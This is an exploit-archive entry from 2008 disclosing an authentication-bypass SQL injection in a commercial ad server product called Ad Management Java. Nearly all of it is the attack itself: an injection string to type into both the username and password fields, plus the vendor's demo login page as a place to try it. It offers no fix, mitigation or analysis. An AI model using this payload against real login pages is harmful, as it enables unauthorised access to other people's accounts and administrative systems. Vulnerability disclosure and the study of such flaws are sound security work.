id: 4419
date: 12/11/2008
title: Ad Management Java (Auth Bypass) SQL Injection Vulnerability
author: R3d-D3v!L
cves: 

============================================================
Ad Management Java (Auth Bypass) SQL Injection Vulnerability
============================================================


[~]Tybe:(Auth Bypass) Remote SQL Injection Vulnerability
   
 [~]Vendor: www.adserversolutions.com
   
 [~]Software: Ad Management Java 
   
 [~] Date: 28.11.2008
   
 [~] contact: N/A
   
 [~] Exploit:
   
 [~] username: r0' or ' 1=1--
 [~] password: r0' or ' 1=1--
   
   
 [?] login 4 d3m0:
   
  www.adserversolutions.com/admgmt_460/logon.jsp
 
 [~]--------------------------------------------------------------------------------



#  0day.today [2023-03-22]  #